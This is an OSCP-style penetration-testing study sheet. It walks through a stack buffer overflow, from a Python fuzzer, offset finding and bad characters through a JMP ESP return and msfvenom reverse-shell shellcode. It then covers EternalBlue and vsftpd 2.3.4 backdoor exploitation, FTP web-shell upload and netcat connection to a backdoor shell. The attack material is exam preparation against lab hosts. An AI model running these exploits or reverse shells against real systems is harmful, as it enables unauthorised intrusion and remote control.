OSCP2026-04-21
Buffer Overflow - Concept
Buffer Overflow - Concept When more data is written to a buffer than it can hold, overwriting adjacent memory.
testsecurityoffensive
What Is It?
When more data is written to a buffer than it can hold, overwriting adjacent memory.
Why It Matters
- Foundational understanding
- CTF challenges
- Understanding exploits
- Memory corruption concepts
Note
Buffer overflow is optional on OSCP 2023+
Memory Layout
┌─────────────────────────────────────┐ High Memory
│ Stack │ ← Grows Down
│ (Local Variables) │
├─────────────────────────────────────┤
│ ↓ │
│ ↑ │
├─────────────────────────────────────┤
│ Heap │ ← Grows Up
├─────────────────────────────────────┤
│ Uninitialized Data (BSS) │
├─────────────────────────────────────┤
│ Initialized Data │
├─────────────────────────────────────┤
│ Text (Code) │
└─────────────────────────────────────┘ Low Memory
Stack Frame
┌─────────────────────────────────────┐
│ Function Parameters │
├─────────────────────────────────────┤
│ Return Address (EIP) │ ← Target!
├─────────────────────────────────────┤
│ Saved Base Pointer (EBP) │
├─────────────────────────────────────┤
│ Local Variables │
│ Buffer │ ← Overflow here
└─────────────────────────────────────┘
Goal
Overwrite EIP to redirect execution to our shellcode.
Buffer Overflow Steps
1. Fuzz → Find crash point
↓
2. Find Offset → Exact bytes to EIP
↓
3. Control EIP → Verify control
↓
4. Bad Chars → Find problematic bytes
↓
5. Find JMP ESP → Redirect execution
↓
6. Shellcode → Generate payload
↓
7. Exploit! → Get shell
BOF Step 1: Fuzzing
#!/usr/bin/python3
import socket
ip = "192.168.1.100"
port = 9999
buffer = "A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(("TRUN /.:/:" + buffer).encode())
s.close()
buffer += "A" * 100
print(f"Sent {len(buffer)} bytes")
except:
print(f"Crashed at {len(buffer)} bytes")
break
BOF Step 2: Find Offset
Generate Pattern
msf-pattern_create -l 3000
# or
!mona pattern_create 3000
Find Offset
# Check EIP value in debugger (e.g., 386F4337)
msf-pattern_offset -l 3000 -q 386F4337
# or
!mona findmsp -distance 3000
BOF Step 3: Control EIP
offset = 2003 # Found offset
buffer = "A" * offset
buffer += "B" * 4 # Should overwrite EIP
buffer += "C" * (3000 - len(buffer))
# Send and verify EIP = 42424242 (BBBB)
BOF Step 4: Bad Characters
Common Bad Characters
| Char | Hex | Reason |
|---|---|---|
| NULL | \x00 | String terminator |
| LF | \x0a | Line feed |
| CR | \x0d | Carriage return |
Testing
!mona bytearray -b "\x00"
!mona compare -f bytearray.bin -a <ESP>
BOF Step 5: Find JMP ESP
Using Mona
!mona jmp -r esp -cpb "\x00"
!mona modules # Find non-ASLR module
!mona find -s "\xff\xe4" -m module.dll
Requirements
- No ASLR
- No bad characters in address
- Executable memory
BOF Step 6-7: Shellcode & Exploit
Generate Shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 \
-b "\x00" -f python -v shellcode
Final Exploit
buffer = b"A" * offset
buffer += b"\xaf\x11\x50\x62" # JMP ESP (little-endian)
buffer += b"\x90" * 16 # NOP sled
buffer += shellcode
SMB Exploitation
SMB Enumeration Recap
smbclient -L //192.168.1.100 -N
smbmap -H 192.168.1.100
enum4linux -a 192.168.1.100
crackmapexec smb 192.168.1.100 --shares
Common Vulnerabilities
- MS17-010 (EternalBlue)
- MS08-067
- Null sessions
- Weak credentials
EternalBlue (MS17-010)
Detection
nmap --script smb-vuln-ms17-010 192.168.1.100
Exploitation with Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.5
run
Manual Exploitation
searchsploit ms17-010
python eternalblue.py 192.168.1.100
FTP Exploitation
Enumeration
nmap --script ftp-anon,ftp-bounce 192.168.1.100
Common Attacks
# Anonymous login
ftp 192.168.1.100
> anonymous / anonymous@
# Version-specific exploits
searchsploit vsftpd 2.3.4
searchsploit proftpd 1.3.3
# Upload web shell (if writable)
put shell.php
vsftpd 2.3.4 Backdoor
Detection
nmap -sV -p21 192.168.1.100
# vsftpd 2.3.4
Exploitation
# Metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
run
# Manual
# Connect and login with :) in username
# Opens shell on port 6200
nc 192.168.1.100 6200